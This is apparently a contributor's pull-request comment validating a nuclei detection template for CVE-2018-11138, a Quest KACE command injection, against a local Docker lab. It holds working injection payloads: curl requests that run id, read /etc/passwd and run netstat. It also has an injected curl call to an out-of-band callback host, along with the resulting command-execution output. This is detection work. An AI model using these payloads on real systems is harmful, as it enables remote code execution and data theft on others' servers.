I've validated this template locally?
Shodan Query: http.title:"kace systems management"
Docker Environment: Complete vulnerable environment provided in code/cves/2018/CVE-2018-11138/
Template Validation Output:
nuclei -u http://localhost:8080 -t http/cves/2018/CVE-2018-11138.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2018-11138] Dumped HTTP request for http://localhost:8080
GET / HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2018-11138] Dumped HTTP response http://localhost:8080
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Thu, 26 Jun 2025 06:42:36 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
<!DOCTYPE html>
<html>
<head>
<title>Quest KACE System Management Appliance</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; background-color: #f5f5f5; }
.container { max-width: 800px; margin: 0 auto; background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
.header { background: #f0f0f0; padding: 20px; border-radius: 5px; margin-bottom: 20px; }
.warning { background: #fff3cd; border: 1px solid #ffeaa7; padding: 15px; border-radius: 5px; margin: 20px 0; }
.endpoint { background: #e9ecef; padding: 10px; border-radius: 3px; font-family: monospace; margin: 5px 0; }
.test-form { background: #f8f9fa; padding: 20px; border-radius: 5px; margin: 20px 0; }
.test-form input[type="text"] { width: 100%; padding: 8px; margin: 5px 0; border: 1px solid #ddd; border-radius: 3px; }
.test-form input[type="submit"] { background: #007bff; color: white; padding: 10px 20px; border: none; border-radius: 3px; cursor: pointer; }
.test-form input[type="submit"]:hover { background: #0056b3; }
.info-box { background: #d1ecf1; border: 1px solid #bee5eb; padding: 15px; border-radius: 5px; margin: 20px 0; }
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>Quest KACE System Management Appliance</h1>
<p><strong>Version:</strong> 8.0.318 (Vulnerable)</p>
<p><strong>Status:</strong> Running</p>
<p><strong>Build Date:</strong> January 15, 2024</p>
</div>
<div class="warning">
<h3>⚠️ Security Warning</h3>
<p>This is a <strong>vulnerable test environment</strong> for CVE-2018-11138.</p>
<p><strong>Do not use in production or expose to the internet.</strong></p>
<p>This application is designed for educational and authorized security testing purposes only.</p>
</div>
<div class="info-box">
<h3>Vulnerability Information</h3>
<p><strong>CVE:</strong> CVE-2018-11138</p>
<p><strong>Severity:</strong> Critical (CVSS 9.8)</p>
<p><strong>Type:</strong> Remote Code Execution (RCE)</p>
<p><strong>Vector:</strong> Command injection in <code>/common/download_agent_installer.php</code></p>
</div>
<h2>Available Endpoints</h2>
<ul>
<li><span class="endpoint">/common/download_agent_installer.php</span> - Vulnerable RCE endpoint</li>
<li><span class="endpoint">/admin/</span> - Administration panel (not implemented)</li>
<li><span class="endpoint">/api/</span> - API endpoints (not implemented)</li>
</ul>
<h2>Test the Vulnerability</h2>
<div class="test-form">
<h3>Manual Test Form</h3>
<form method="POST" action="/common/download_agent_installer.php">
<label>Platform:</label>
<input type="text" name="platform" value="linux" required>
<label>Custom Install Options (Command Injection):</label>
<input type="text" name="custom_install_options" placeholder=";id;echo+" required>
<input type="submit" value="Test Vulnerability">
</form>
</div>
<h2>Command Line Testing</h2>
<p>Use the following commands to test the RCE vulnerability:</p>
<h3>Basic Command Execution:</h3>
<div class="endpoint">
curl -X POST http://localhost/common/download_agent_installer.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "platform=linux&custom_install_options=;id;echo+"
</div>
<h3>File Read:</h3>
<div class="endpoint">
curl -X POST http://localhost/common/download_agent_installer.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "platform=linux&custom_install_options=;cat+/etc/passwd;echo+"
</div>
<h3>Network Reconnaissance:</h3>
<div class="endpoint">
curl -X POST http://localhost/common/download_agent_installer.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "platform=linux&custom_install_options=;netstat+-an;echo+"
</div>
<h2>Nuclei Template Testing</h2>
<p>Test with the Nuclei template:</p>
<div class="endpoint">
nuclei -u http://localhost -t http/cves/2018/CVE-2018-11138.yaml -debug
</div>
<h2>References</h2>
<ul>
<li><a href="https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities" target="_blank">Core Security Advisory</a></li>
<li><a href="https://www.exploit-db.com/exploits/44950/" target="_blank">Exploit-DB</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-11138" target="_blank">NVD</a></li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11138" target="_blank">CVE Details</a></li>
</ul>
<div class="warning">
<h3>Disclaimer</h3>
<p>This application is provided for educational and authorized security testing purposes only.
Always ensure you have proper authorization before testing any systems.</p>
</div>
</div>
</body>
</html>
[INF] Using Interactsh Server: oast.online
[INF] [CVE-2018-11138] Dumped HTTP request for http://localhost:8080/common/download_agent_installer.php
POST /common/download_agent_installer.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
platform=linux&custom_install_options=;curl+http://d1eenn53mhioq9auc7609uyxq7na54g13.oast.online;echo+
[DBG] [CVE-2018-11138] Dumped HTTP response http://localhost:8080/common/download_agent_installer.php
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Thu, 26 Jun 2025 06:42:36 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
<html><head><title>KACE Agent Installer</title></head><body><h1>Quest KACE System Management Appliance</h1><h2>Agent Installation</h2><p><strong>Platform:</strong> linux</p><p><strong>Install Options:</strong> ;curl http://d1eenn53mhioq9auc7609uyxq7na54g13.oast.online;echo </p><p><strong>Output:</strong></p><pre>Installing agent for platform: linux
<html><head></head><body>31g45an7qxyu9067cua9qoihm35nnee1d</body></html>
</pre><p><em>Note: This is a vulnerable test environment for CVE-2018-11138</em></p></body></html>
[d1eenn53mhioq9auc7609uyxq7na54g13] Received HTTP interaction from 49.207.225.8 at 2025-06-26 06:42:37
------------
HTTP Request
------------
GET / HTTP/1.1
Host: d1eenn53mhioq9auc7609uyxq7na54g13.oast.online
Accept: */*
User-Agent: curl/7.74.0
------------
HTTP Response
------------
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.online
X-Interactsh-Version: 1.2.2
<html><head></head><body>31g45an7qxyu9067cua9qoihm35nnee1d</body></html>
[CVE-2018-11138:word-1] [http] [critical] http://localhost:8080/common/download_agent_installer.php
[INF] Scan completed in 5.945631875s. 1 matches found.
Command Injection Validation:
curl -X POST http://localhost:8080/common/download_agent_installer.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "platform=linux&custom_install_options=;id;echo+"
# Response shows command execution:
<pre>Installing agent for platform: linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
/claim #12468
khalid shareef
@Khalid6468
ProjectDiscovery
@projectdiscovery